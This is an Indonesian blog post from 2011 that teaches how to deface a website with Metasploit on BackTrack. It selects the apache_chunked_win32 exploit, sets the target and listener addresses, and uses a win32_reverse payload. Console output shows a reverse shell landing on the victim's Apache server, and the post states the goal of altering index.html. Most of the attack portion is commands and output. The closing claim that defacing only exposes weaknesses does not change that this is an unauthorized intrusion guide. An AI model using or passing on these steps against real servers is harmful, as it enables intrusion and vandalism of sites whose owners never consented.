Thursday, April 7, 2011

Defacing Menggunakan Metasploits with backtrack

langsung saja pada intinya mohon maaf bila ada kesalahan

masuk ke konsole lalu ketik msfconsole

langkah kedua setelah masuk ke msf console

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow

Jadi disini kita bisa melihat daftar exploit pada Metasploit (penulis: maaf saya ringkas saja). salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32

Sekarang ketik perintah exploit dibawah ini:

msf > use apache_chunked_win32

msf apache_chunked_win32 >

Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:

msf apache_chunked_win32 > show options

Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port
Target: Windows NT/2K Brute Force

msf apache_chunked_win32 >

Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini:

msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >

Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

msf apache_chunked_win32 > show payloads

Metasploit Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
msf apache_chunked_win32 >

Ehm! Pilihan yang bagus bukan? Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.

Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini sintak-nya:

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >

Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:


msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >

Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
Starting Reverse Handler.
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>


Nah Kita sudah Masuk tuh Ke shell webservernya target........

kita mau apain aja terserah..... 


pesan : defacing adalah menggati halaman utama tetapi jangan menghapus...........
Defacing bukan kegiatan untuk merusak tetapi untuk memberitahukan kelemahan 
web tersebut....

No comments:

Post a Comment